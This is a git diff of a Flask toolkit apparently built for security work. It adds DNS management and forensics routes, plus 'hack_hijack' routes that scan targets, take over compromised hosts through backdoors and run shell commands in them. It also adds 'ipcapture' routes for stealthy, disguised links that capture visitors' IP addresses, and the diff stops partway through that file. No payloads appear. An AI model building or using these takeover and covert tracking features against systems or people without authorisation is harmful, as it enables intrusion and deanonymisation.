|
||||
name = ''
|
||||
hosts.append({'ip': candidate, 'mac': mac, 'name': name})
|
||||
except Exception:
|
||||
pass
|
||||
except Exception:
|
||||
pass
|
||||
info['hosts'] = hosts[:50] # Limit
|
||||
|
||||
return jsonify(info)
|
||||
|
||||
|
||||
@dns_service_bp.route('/nameserver/binary-info')
|
||||
@login_required
|
||||
def binary_info():
|
||||
"""Get info about the Go nameserver binary."""
|
||||
mgr = _mgr()
|
||||
binary = mgr.find_binary()
|
||||
info = {
|
||||
'ok': True,
|
||||
'found': binary is not None,
|
||||
'path': binary,
|
||||
'running': mgr.is_running(),
|
||||
'pid': mgr._pid,
|
||||
'config_path': mgr._config_path,
|
||||
'listen_dns': mgr._config.get('listen_dns', ''),
|
||||
'listen_api': mgr._config.get('listen_api', ''),
|
||||
'upstream': mgr._config.get('upstream', []),
|
||||
}
|
||||
if binary:
|
||||
import subprocess as sp
|
||||
try:
|
||||
r = sp.run([binary, '-version'], capture_output=True, text=True, timeout=5)
|
||||
info['version'] = r.stdout.strip() or r.stderr.strip()
|
||||
except Exception:
|
||||
info['version'] = 'unknown'
|
||||
return jsonify(info)
|
||||
|
||||
|
||||
@dns_service_bp.route('/nameserver/query', methods=['POST'])
|
||||
@login_required
|
||||
def query_test():
|
||||
"""Resolve a DNS name using the running nameserver (or system resolver)."""
|
||||
import socket
|
||||
import subprocess as sp
|
||||
data = request.get_json(silent=True) or {}
|
||||
name = data.get('name', '').strip()
|
||||
qtype = data.get('type', 'A').upper()
|
||||
use_local = data.get('use_local', True)
|
||||
|
||||
if not name:
|
||||
return jsonify({'ok': False, 'error': 'Name required'})
|
||||
|
||||
mgr = _mgr()
|
||||
listen = mgr._config.get('listen_dns', '0.0.0.0:53')
|
||||
host, port = (listen.rsplit(':', 1) + ['53'])[:2]
|
||||
if host in ('0.0.0.0', '::'):
|
||||
host = '127.0.0.1'
|
||||
|
||||
results = []
|
||||
|
||||
# Try nslookup / dig
|
||||
try:
|
||||
if use_local and mgr.is_running():
|
||||
cmd = ['nslookup', '-type=' + qtype, name, host]
|
||||
else:
|
||||
cmd = ['nslookup', '-type=' + qtype, name]
|
||||
r = sp.run(cmd, capture_output=True, text=True, timeout=10)
|
||||
raw = r.stdout + r.stderr
|
||||
results.append({'method': 'nslookup', 'output': raw.strip(), 'cmd': ' '.join(cmd)})
|
||||
except FileNotFoundError:
|
||||
pass
|
||||
except Exception as e:
|
||||
results.append({'method': 'nslookup', 'output': str(e), 'cmd': ''})
|
||||
|
||||
# Python socket fallback for A records
|
||||
if qtype == 'A':
|
||||
try:
|
||||
addrs = socket.getaddrinfo(name, None, socket.AF_INET)
|
||||
ips = list(set(a[4][0] for a in addrs))
|
||||
results.append({'method': 'socket', 'output': ', '.join(ips) if ips else 'No results', 'cmd': f'getaddrinfo({name})'})
|
||||
except socket.gaierror as e:
|
||||
results.append({'method': 'socket', 'output': str(e), 'cmd': f'getaddrinfo({name})'})
|
||||
|
||||
return jsonify({'ok': True, 'name': name, 'type': qtype, 'results': results})
|
||||
|
||||
|
||||
@dns_service_bp.route('/status')
|
||||
@login_required
|
||||
def status():
|
||||
return jsonify(_mgr().status())
|
||||
|
||||
|
||||
@dns_service_bp.route('/start', methods=['POST'])
|
||||
@login_required
|
||||
def start():
|
||||
return jsonify(_mgr().start())
|
||||
|
||||
|
||||
@dns_service_bp.route('/stop', methods=['POST'])
|
||||
@login_required
|
||||
def stop():
|
||||
return jsonify(_mgr().stop())
|
||||
|
||||
|
||||
@dns_service_bp.route('/config', methods=['GET'])
|
||||
@login_required
|
||||
def get_config():
|
||||
return jsonify({'ok': True, 'config': _mgr().get_config()})
|
||||
|
||||
|
||||
@dns_service_bp.route('/config', methods=['PUT'])
|
||||
@login_required
|
||||
def update_config():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_mgr().update_config(data))
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones', methods=['GET'])
|
||||
@login_required
|
||||
def list_zones():
|
||||
try:
|
||||
zones = _mgr().list_zones()
|
||||
return jsonify({'ok': True, 'zones': zones})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones', methods=['POST'])
|
||||
@login_required
|
||||
def create_zone():
|
||||
data = request.get_json(silent=True) or {}
|
||||
domain = data.get('domain', '').strip()
|
||||
if not domain:
|
||||
return jsonify({'ok': False, 'error': 'Domain required'})
|
||||
try:
|
||||
return jsonify(_mgr().create_zone(domain))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>', methods=['GET'])
|
||||
@login_required
|
||||
def get_zone(domain):
|
||||
try:
|
||||
return jsonify(_mgr().get_zone(domain))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_zone(domain):
|
||||
try:
|
||||
return jsonify(_mgr().delete_zone(domain))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>/records', methods=['GET'])
|
||||
@login_required
|
||||
def list_records(domain):
|
||||
try:
|
||||
records = _mgr().list_records(domain)
|
||||
return jsonify({'ok': True, 'records': records})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>/records', methods=['POST'])
|
||||
@login_required
|
||||
def add_record(domain):
|
||||
data = request.get_json(silent=True) or {}
|
||||
try:
|
||||
return jsonify(_mgr().add_record(
|
||||
domain,
|
||||
rtype=data.get('type', 'A'),
|
||||
name=data.get('name', ''),
|
||||
value=data.get('value', ''),
|
||||
ttl=int(data.get('ttl', 300)),
|
||||
priority=int(data.get('priority', 0)),
|
||||
))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>/records/<record_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_record(domain, record_id):
|
||||
try:
|
||||
return jsonify(_mgr().delete_record(domain, record_id))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>/mail-setup', methods=['POST'])
|
||||
@login_required
|
||||
def mail_setup(domain):
|
||||
data = request.get_json(silent=True) or {}
|
||||
try:
|
||||
return jsonify(_mgr().setup_mail_records(
|
||||
domain,
|
||||
mx_host=data.get('mx_host', ''),
|
||||
dkim_key=data.get('dkim_key', ''),
|
||||
spf_allow=data.get('spf_allow', ''),
|
||||
))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>/dnssec/enable', methods=['POST'])
|
||||
@login_required
|
||||
def dnssec_enable(domain):
|
||||
try:
|
||||
return jsonify(_mgr().enable_dnssec(domain))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zones/<domain>/dnssec/disable', methods=['POST'])
|
||||
@login_required
|
||||
def dnssec_disable(domain):
|
||||
try:
|
||||
return jsonify(_mgr().disable_dnssec(domain))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/metrics')
|
||||
@login_required
|
||||
def metrics():
|
||||
try:
|
||||
return jsonify({'ok': True, 'metrics': _mgr().get_metrics()})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
# ── New Go API proxies ────────────────────────────────────────────────
|
||||
|
||||
def _proxy_get(endpoint):
|
||||
try:
|
||||
return jsonify(_mgr()._api_get(endpoint))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
def _proxy_post(endpoint, data=None):
|
||||
try:
|
||||
return jsonify(_mgr()._api_post(endpoint, data))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
def _proxy_delete(endpoint):
|
||||
try:
|
||||
return jsonify(_mgr()._api_delete(endpoint))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/querylog')
|
||||
@login_required
|
||||
def querylog():
|
||||
limit = request.args.get('limit', '200')
|
||||
return _proxy_get(f'/api/querylog?limit={limit}')
|
||||
|
||||
|
||||
@dns_service_bp.route('/querylog', methods=['DELETE'])
|
||||
@login_required
|
||||
def clear_querylog():
|
||||
return _proxy_delete('/api/querylog')
|
||||
|
||||
|
||||
@dns_service_bp.route('/cache')
|
||||
@login_required
|
||||
def cache_list():
|
||||
return _proxy_get('/api/cache')
|
||||
|
||||
|
||||
@dns_service_bp.route('/cache', methods=['DELETE'])
|
||||
@login_required
|
||||
def cache_flush():
|
||||
key = request.args.get('key', '')
|
||||
if key:
|
||||
return _proxy_delete(f'/api/cache?key={key}')
|
||||
return _proxy_delete('/api/cache')
|
||||
|
||||
|
||||
@dns_service_bp.route('/blocklist')
|
||||
@login_required
|
||||
def blocklist_list():
|
||||
return _proxy_get('/api/blocklist')
|
||||
|
||||
|
||||
@dns_service_bp.route('/blocklist', methods=['POST'])
|
||||
@login_required
|
||||
def blocklist_add():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/blocklist', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/blocklist', methods=['DELETE'])
|
||||
@login_required
|
||||
def blocklist_remove():
|
||||
data = request.get_json(silent=True) or {}
|
||||
try:
|
||||
return jsonify(_mgr()._api_urllib('/api/blocklist', 'DELETE', data)
|
||||
if not __import__('importlib').util.find_spec('requests')
|
||||
else _mgr()._api_delete_with_body('/api/blocklist', data))
|
||||
except Exception:
|
||||
# Fallback: use POST with _method override or direct urllib
|
||||
import json as _json
|
||||
import urllib.request
|
||||
mgr = _mgr()
|
||||
url = f'{mgr.api_base}/api/blocklist'
|
||||
body = _json.dumps(data).encode()
|
||||
req = urllib.request.Request(url, data=body, method='DELETE',
|
||||
headers={'Authorization': f'Bearer {mgr.api_token}',
|
||||
'Content-Type': 'application/json'})
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=5) as resp:
|
||||
return jsonify(_json.loads(resp.read()))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/stats/top-domains')
|
||||
@login_required
|
||||
def top_domains():
|
||||
limit = request.args.get('limit', '50')
|
||||
return _proxy_get(f'/api/stats/top-domains?limit={limit}')
|
||||
|
||||
|
||||
@dns_service_bp.route('/stats/query-types')
|
||||
@login_required
|
||||
def query_types():
|
||||
return _proxy_get('/api/stats/query-types')
|
||||
|
||||
|
||||
@dns_service_bp.route('/stats/clients')
|
||||
@login_required
|
||||
def client_stats():
|
||||
return _proxy_get('/api/stats/clients')
|
||||
|
||||
|
||||
@dns_service_bp.route('/resolver/ns-cache')
|
||||
@login_required
|
||||
def ns_cache():
|
||||
return _proxy_get('/api/resolver/ns-cache')
|
||||
|
||||
|
||||
@dns_service_bp.route('/resolver/ns-cache', methods=['DELETE'])
|
||||
@login_required
|
||||
def flush_ns_cache():
|
||||
return _proxy_delete('/api/resolver/ns-cache')
|
||||
|
||||
|
||||
@dns_service_bp.route('/rootcheck')
|
||||
@login_required
|
||||
def rootcheck():
|
||||
return _proxy_get('/api/rootcheck')
|
||||
|
||||
|
||||
@dns_service_bp.route('/benchmark', methods=['POST'])
|
||||
@login_required
|
||||
def benchmark():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/benchmark', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/forwarding')
|
||||
@login_required
|
||||
def forwarding_list():
|
||||
return _proxy_get('/api/forwarding')
|
||||
|
||||
|
||||
@dns_service_bp.route('/forwarding', methods=['POST'])
|
||||
@login_required
|
||||
def forwarding_add():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/forwarding', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/forwarding', methods=['DELETE'])
|
||||
@login_required
|
||||
def forwarding_remove():
|
||||
data = request.get_json(silent=True) or {}
|
||||
try:
|
||||
import json as _json, urllib.request
|
||||
mgr = _mgr()
|
||||
url = f'{mgr.api_base}/api/forwarding'
|
||||
body = _json.dumps(data).encode()
|
||||
req = urllib.request.Request(url, data=body, method='DELETE',
|
||||
headers={'Authorization': f'Bearer {mgr.api_token}',
|
||||
'Content-Type': 'application/json'})
|
||||
with urllib.request.urlopen(req, timeout=5) as resp:
|
||||
return jsonify(_json.loads(resp.read()))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/zone-export/<domain>')
|
||||
@login_required
|
||||
def zone_export(domain):
|
||||
return _proxy_get(f'/api/zone-export/{domain}')
|
||||
|
||||
|
||||
@dns_service_bp.route('/zone-import/<domain>', methods=['POST'])
|
||||
@login_required
|
||||
def zone_import(domain):
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post(f'/api/zone-import/{domain}', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/zone-clone', methods=['POST'])
|
||||
@login_required
|
||||
def zone_clone():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/zone-clone', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/zone-bulk-records/<domain>', methods=['POST'])
|
||||
@login_required
|
||||
def bulk_records(domain):
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post(f'/api/zone-bulk-records/{domain}', data)
|
||||
|
||||
|
||||
# ── Hosts file management ────────────────────────────────────────────
|
||||
|
||||
@dns_service_bp.route('/hosts')
|
||||
@login_required
|
||||
def hosts_list():
|
||||
return _proxy_get('/api/hosts')
|
||||
|
||||
|
||||
@dns_service_bp.route('/hosts', methods=['POST'])
|
||||
@login_required
|
||||
def hosts_add():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/hosts', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/hosts', methods=['DELETE'])
|
||||
@login_required
|
||||
def hosts_remove():
|
||||
data = request.get_json(silent=True) or {}
|
||||
try:
|
||||
import json as _json, urllib.request
|
||||
mgr = _mgr()
|
||||
url = f'{mgr.api_base}/api/hosts'
|
||||
body = _json.dumps(data).encode()
|
||||
req_obj = urllib.request.Request(url, data=body, method='DELETE',
|
||||
headers={'Authorization': f'Bearer {mgr.api_token}',
|
||||
'Content-Type': 'application/json'})
|
||||
with urllib.request.urlopen(req_obj, timeout=5) as resp:
|
||||
return jsonify(_json.loads(resp.read()))
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@dns_service_bp.route('/hosts/import', methods=['POST'])
|
||||
@login_required
|
||||
def hosts_import():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/hosts/import', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/hosts/export')
|
||||
@login_required
|
||||
def hosts_export():
|
||||
return _proxy_get('/api/hosts/export')
|
||||
|
||||
|
||||
# ── Encryption (DoT / DoH) ──────────────────────────────────────────
|
||||
|
||||
@dns_service_bp.route('/encryption')
|
||||
@login_required
|
||||
def encryption_status():
|
||||
return _proxy_get('/api/encryption')
|
||||
|
||||
|
||||
@dns_service_bp.route('/encryption', methods=['PUT', 'POST'])
|
||||
@login_required
|
||||
def encryption_update():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/encryption', data)
|
||||
|
||||
|
||||
@dns_service_bp.route('/encryption/test', methods=['POST'])
|
||||
@login_required
|
||||
def encryption_test():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return _proxy_post('/api/encryption/test', data)
|
||||
|
||||
|
||||
# ── EZ Intranet Domain ──────────────────────────────────────────────
|
||||
|
||||
@dns_service_bp.route('/ez-intranet', methods=['POST'])
|
||||
@login_required
|
||||
def ez_intranet():
|
||||
"""One-click intranet domain setup. Creates zone + host records + reverse zone."""
|
||||
import socket
|
||||
data = request.get_json(silent=True) or {}
|
||||
domain = data.get('domain', '').strip()
|
||||
if not domain:
|
||||
return jsonify({'ok': False, 'error': 'Domain name required'})
|
||||
|
||||
mgr = _mgr()
|
||||
results = {'ok': True, 'domain': domain, 'steps': []}
|
||||
|
||||
# Detect local network info
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.connect(('8.8.8.8', 53))
|
||||
local_ip = s.getsockname()[0]
|
||||
s.close()
|
||||
except Exception:
|
||||
local_ip = '127.0.0.1'
|
||||
|
||||
hostname = socket.gethostname()
|
||||
|
||||
# Step 1: Create the zone
|
||||
try:
|
||||
r = mgr.create_zone(domain)
|
||||
results['steps'].append({'step': 'Create zone', 'ok': r.get('ok', False)})
|
||||
except Exception as e:
|
||||
results['steps'].append({'step': 'Create zone', 'ok': False, 'error': str(e)})
|
||||
|
||||
# Step 2: Add server record (ns.domain -> local IP)
|
||||
records = [
|
||||
{'type': 'A', 'name': f'ns.{domain}.', 'value': local_ip, 'ttl': 3600},
|
||||
{'type': 'A', 'name': f'{domain}.', 'value': local_ip, 'ttl': 3600},
|
||||
{'type': 'A', 'name': f'{hostname}.{domain}.', 'value': local_ip, 'ttl': 3600},
|
||||
]
|
||||
|
||||
# Add custom hosts from request
|
||||
for host in data.get('hosts', []):
|
||||
ip = host.get('ip', '').strip()
|
||||
name = host.get('name', '').strip()
|
||||
if ip and name:
|
||||
if not name.endswith('.'):
|
||||
name = f'{name}.{domain}.'
|
||||
records.append({'type': 'A', 'name': name, 'value': ip, 'ttl': 3600})
|
||||
|
||||
for rec in records:
|
||||
try:
|
||||
r = mgr.add_record(domain, rtype=rec['type'], name=rec['name'],
|
||||
value=rec['value'], ttl=rec['ttl'])
|
||||
results['steps'].append({'step': f'Add {rec["name"]} -> {rec["value"]}', 'ok': r.get('ok', False)})
|
||||
except Exception as e:
|
||||
results['steps'].append({'step': f'Add {rec["name"]}', 'ok': False, 'error': str(e)})
|
||||
|
||||
# Step 3: Add hosts file entries too for immediate local resolution
|
||||
try:
|
||||
import json as _json, urllib.request
|
||||
hosts_entries = [
|
||||
{'ip': local_ip, 'hostname': domain, 'aliases': [hostname + '.' + domain]},
|
||||
]
|
||||
for host in data.get('hosts', []):
|
||||
ip = host.get('ip', '').strip()
|
||||
name = host.get('name', '').strip()
|
||||
if ip and name:
|
||||
hosts_entries.append({'ip': ip, 'hostname': name + '.' + domain if '.' not in name else name})
|
||||
|
||||
for entry in hosts_entries:
|
||||
body = _json.dumps(entry).encode()
|
||||
url = f'{mgr.api_base}/api/hosts'
|
||||
req_obj = urllib.request.Request(url, data=body, method='POST',
|
||||
headers={'Authorization': f'Bearer {mgr.api_token}',
|
||||
'Content-Type': 'application/json'})
|
||||
urllib.request.urlopen(req_obj, timeout=5)
|
||||
results['steps'].append({'step': 'Add hosts entries', 'ok': True})
|
||||
except Exception as e:
|
||||
results['steps'].append({'step': 'Add hosts entries', 'ok': False, 'error': str(e)})
|
||||
|
||||
# Step 4: Create reverse zone if requested
|
||||
if data.get('reverse_zone', True):
|
||||
parts = local_ip.split('.')
|
||||
if len(parts) == 4:
|
||||
rev_zone = f'{parts[2]}.{parts[1]}.{parts[0]}.in-addr.arpa'
|
||||
try:
|
||||
mgr.create_zone(rev_zone)
|
||||
# Add PTR for server
|
||||
mgr.add_record(rev_zone, rtype='PTR',
|
||||
name=f'{parts[3]}.{rev_zone}.',
|
||||
value=f'{hostname}.{domain}.', ttl=3600)
|
||||
results['steps'].append({'step': f'Create reverse zone {rev_zone}', 'ok': True})
|
||||
except Exception as e:
|
||||
results['steps'].append({'step': 'Create reverse zone', 'ok': False, 'error': str(e)})
|
||||
|
||||
results['local_ip'] = local_ip
|
||||
results['hostname'] = hostname
|
||||
return jsonify(results)
|
||||
71
web/routes/forensics.py
Normal file
71
web/routes/forensics.py
Normal file
@ -0,0 +1,71 @@
|
||||
"""Forensics Toolkit routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
forensics_bp = Blueprint('forensics', __name__, url_prefix='/forensics')
|
||||
|
||||
def _get_engine():
|
||||
from modules.forensics import get_forensics
|
||||
return get_forensics()
|
||||
|
||||
@forensics_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('forensics.html')
|
||||
|
||||
@forensics_bp.route('/hash', methods=['POST'])
|
||||
@login_required
|
||||
def hash_file():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().hash_file(data.get('file', ''), data.get('algorithms')))
|
||||
|
||||
@forensics_bp.route('/verify', methods=['POST'])
|
||||
@login_required
|
||||
def verify_hash():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().verify_hash(
|
||||
data.get('file', ''), data.get('hash', ''), data.get('algorithm')
|
||||
))
|
||||
|
||||
@forensics_bp.route('/image', methods=['POST'])
|
||||
@login_required
|
||||
def create_image():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().create_image(data.get('source', ''), data.get('output')))
|
||||
|
||||
@forensics_bp.route('/carve', methods=['POST'])
|
||||
@login_required
|
||||
def carve_files():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().carve_files(
|
||||
data.get('source', ''), data.get('file_types'), data.get('max_files', 100)
|
||||
))
|
||||
|
||||
@forensics_bp.route('/metadata', methods=['POST'])
|
||||
@login_required
|
||||
def extract_metadata():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().extract_metadata(data.get('file', '')))
|
||||
|
||||
@forensics_bp.route('/timeline', methods=['POST'])
|
||||
@login_required
|
||||
def build_timeline():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().build_timeline(
|
||||
data.get('directory', ''), data.get('recursive', True), data.get('max_entries', 10000)
|
||||
))
|
||||
|
||||
@forensics_bp.route('/evidence')
|
||||
@login_required
|
||||
def list_evidence():
|
||||
return jsonify(_get_engine().list_evidence())
|
||||
|
||||
@forensics_bp.route('/carved')
|
||||
@login_required
|
||||
def list_carved():
|
||||
return jsonify(_get_engine().list_carved())
|
||||
|
||||
@forensics_bp.route('/custody')
|
||||
@login_required
|
||||
def custody_log():
|
||||
return jsonify(_get_engine().get_custody_log())
|
||||
139
web/routes/hack_hijack.py
Normal file
139
web/routes/hack_hijack.py
Normal file
@ -0,0 +1,139 @@
|
||||
"""Hack Hijack — web routes for scanning and taking over compromised systems."""
|
||||
|
||||
import threading
|
||||
import uuid
|
||||
from flask import Blueprint, render_template, request, jsonify, Response
|
||||
from web.auth import login_required
|
||||
|
||||
hack_hijack_bp = Blueprint('hack_hijack', __name__)
|
||||
|
||||
# Running scans keyed by job_id
|
||||
_running_scans: dict = {}
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.hack_hijack import get_hack_hijack
|
||||
return get_hack_hijack()
|
||||
|
||||
|
||||
# ── UI ────────────────────────────────────────────────────────────────────────
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('hack_hijack.html')
|
||||
|
||||
|
||||
# ── Scanning ──────────────────────────────────────────────────────────────────
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/scan', methods=['POST'])
|
||||
@login_required
|
||||
def start_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
target = data.get('target', '').strip()
|
||||
scan_type = data.get('scan_type', 'quick')
|
||||
custom_ports = data.get('custom_ports', [])
|
||||
|
||||
if not target:
|
||||
return jsonify({'ok': False, 'error': 'Target IP required'})
|
||||
|
||||
# Validate scan type
|
||||
if scan_type not in ('quick', 'full', 'nmap', 'custom'):
|
||||
scan_type = 'quick'
|
||||
|
||||
job_id = str(uuid.uuid4())[:8]
|
||||
result_holder = {'result': None, 'error': None, 'done': False}
|
||||
_running_scans[job_id] = result_holder
|
||||
|
||||
def do_scan():
|
||||
try:
|
||||
svc = _svc()
|
||||
r = svc.scan_target(
|
||||
target,
|
||||
scan_type=scan_type,
|
||||
custom_ports=custom_ports,
|
||||
timeout=3.0,
|
||||
)
|
||||
result_holder['result'] = r.to_dict()
|
||||
except Exception as e:
|
||||
result_holder['error'] = str(e)
|
||||
finally:
|
||||
result_holder['done'] = True
|
||||
|
||||
threading.Thread(target=do_scan, daemon=True).start()
|
||||
return jsonify({'ok': True, 'job_id': job_id,
|
||||
'message': f'Scan started on {target} ({scan_type})'})
|
||||
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/scan/<job_id>', methods=['GET'])
|
||||
@login_required
|
||||
def scan_status(job_id):
|
||||
holder = _running_scans.get(job_id)
|
||||
if not holder:
|
||||
return jsonify({'ok': False, 'error': 'Job not found'})
|
||||
if not holder['done']:
|
||||
return jsonify({'ok': True, 'done': False, 'message': 'Scan in progress...'})
|
||||
if holder['error']:
|
||||
return jsonify({'ok': False, 'error': holder['error'], 'done': True})
|
||||
# Clean up
|
||||
_running_scans.pop(job_id, None)
|
||||
return jsonify({'ok': True, 'done': True, 'result': holder['result']})
|
||||
|
||||
|
||||
# ── Takeover ──────────────────────────────────────────────────────────────────
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/takeover', methods=['POST'])
|
||||
@login_required
|
||||
def attempt_takeover():
|
||||
data = request.get_json(silent=True) or {}
|
||||
host = data.get('host', '').strip()
|
||||
backdoor = data.get('backdoor', {})
|
||||
if not host or not backdoor:
|
||||
return jsonify({'ok': False, 'error': 'Host and backdoor data required'})
|
||||
svc = _svc()
|
||||
result = svc.attempt_takeover(host, backdoor)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
# ── Sessions ──────────────────────────────────────────────────────────────────
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/sessions', methods=['GET'])
|
||||
@login_required
|
||||
def list_sessions():
|
||||
svc = _svc()
|
||||
return jsonify({'ok': True, 'sessions': svc.list_sessions()})
|
||||
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/sessions/<session_id>/exec', methods=['POST'])
|
||||
@login_required
|
||||
def shell_exec(session_id):
|
||||
data = request.get_json(silent=True) or {}
|
||||
command = data.get('command', '')
|
||||
if not command:
|
||||
return jsonify({'ok': False, 'error': 'No command provided'})
|
||||
svc = _svc()
|
||||
result = svc.shell_execute(session_id, command)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/sessions/<session_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def close_session(session_id):
|
||||
svc = _svc()
|
||||
return jsonify(svc.close_session(session_id))
|
||||
|
||||
|
||||
# ── History ───────────────────────────────────────────────────────────────────
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/history', methods=['GET'])
|
||||
@login_required
|
||||
def scan_history():
|
||||
svc = _svc()
|
||||
return jsonify({'ok': True, 'scans': svc.get_scan_history()})
|
||||
|
||||
|
||||
@hack_hijack_bp.route('/hack-hijack/history', methods=['DELETE'])
|
||||
@login_required
|
||||
def clear_history():
|
||||
svc = _svc()
|
||||
return jsonify(svc.clear_history())
|
||||
172
web/routes/ipcapture.py
Normal file
172
web/routes/ipcapture.py
Normal file
@ -0,0 +1,172 @@
|
||||
"""IP Capture & Redirect — web routes for stealthy link tracking."""
|
||||
|
||||
from flask import (Blueprint, render_template, request, jsonify,
|
||||
redirect, Response)
|
||||
from web.auth import login_required
|
||||
|
||||
ipcapture_bp = Blueprint('ipcapture', __name__)
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.ipcapture import get_ip_capture
|
||||
return get_ip_capture()
|
||||
|
||||
|
||||
# ── Management UI ────────────────────────────────────────────────────────────
|
||||
|
||||
@ipcapture_bp.route('/ipcapture/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('ipcapture.html')
|
||||
|
||||
|
||||
@ipcapture_bp.route('/ipcapture/links', methods=['GET'])
|
||||
@login_required
|
||||
def list_links():
|
||||
svc = _svc()
|
||||
links = svc.list_links()
|
||||
for l in links:
|
||||
l['stats'] = svc.get_stats(l['key'])
|
||||
return jsonify({'ok': True, 'links': links})
|
||||
|
||||
|
||||
@ipcapture_bp.route('/ipcapture/links', methods=['POST'])
|
||||
@login_required
|
||||
def create_link():
|
||||
data = request.get_json(silent=True) or {}
|
||||
target = data.get('target_url', '').strip()
|
||||
if not target:
|
||||
return jsonify({'ok': False, 'error': 'Target URL required'})
|
||||
if not target.startswith(('http://', 'https://')):
|
||||
target = 'https://' + target
|
||||
result = _svc().create_link(
|
||||
target_url=target,
|
||||
name=data.get('name', ''),
|
||||
disguise=data.get('disguise', 'article'),
|
||||
)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@ipcapture_bp.route('/ipcapture/links/<key>', methods=['GET'])
|
||||
@login_required
|
||||
def get_link(key):
|
||||
svc = _svc()
|
||||
link = svc.get_link(key)
|
||||
if not link:
|
||||
return jsonify({'ok': False, 'error': 'Link not found'})
|
||||
link['stats'] = svc.get_stats(key)
|
||||
return jsonify({'ok': True, 'link': link})
|
||||
|
||||
|
||||
@ipcapture_bp.route('/ipcapture/links/<key>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_link(key):
|
||||
if _svc().delete_link(key):
|
||||
return jsonify({'ok': True})
|
||||
